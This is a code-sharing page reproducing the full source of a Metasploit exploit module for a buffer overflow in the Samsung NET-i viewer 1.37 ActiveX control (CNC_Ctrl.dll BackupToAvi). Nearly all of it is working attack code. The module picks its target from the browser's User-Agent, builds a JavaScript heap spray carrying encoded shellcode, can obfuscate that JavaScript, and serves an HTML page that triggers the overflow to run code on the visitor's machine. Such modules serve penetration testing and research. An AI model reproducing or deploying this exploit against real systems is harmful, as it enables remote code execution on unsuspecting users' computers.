扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow", 'Description'=> %q{ This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX installed with the Samsung NET-i viewer 1.37. Specifically, when supplying a long string for the fname parameter to the BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer overflow due to the use of memcpy with an incorrect size, resulting in remote code execution under the context of the user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '81453'], [ 'BID', '53193'], [ 'URL', 'http://aluigi.altervista.org/adv/netiware_1-adv.txt' ] ], 'Payload'=> { 'Space' => 1024, 'BadChars'=> "\x00" }, 'DefaultOptions'=> { 'ExitFunction' => "seh", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets'=> [ # Samsung NET-i viewer 1.37 # CNC_Ctrl.dll 1.5.1.1 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Ret' => 0x0c0c0c0c, 'Offset' => '0x800 - code.length', } ], [ 'IE 7 on Windows XP SP3', { 'Ret' => 0x0c0c0c0c, 'Offset' => '0x800 - code.length', } ] ], 'Privileged' => false, 'DisclosureDate' => "Apr 21 2012", 'DefaultTarget'=> 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1]#IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2]#IE 7 on Windows XP SP3 else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent.to_s}") send_not_found(cli) return end print_status("Target set: #{my_target.name}") p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x200; i++) { heap_obj.alloc(block); } JS js = heaplib(js, {:noobfu => true}) #obfuscate on demand if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end bof = Rex::Text.to_unescape("\x0c" * 2048, Rex::Arch.endian(my_target.arch)) html = <<-EOS <html> <head> <script> #{js} </script> </head> <body> <object id="target1" classid="CLSID:3D6F2DBA-F4E5-40A6-8725-E99BC96CC23A"></object> <script> target1.BackupToAvi(0, 0, 0, unescape("#{bof}")); </script> <body> </html> EOS html = html.gsub(/^\t\t/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end |
体验盒子
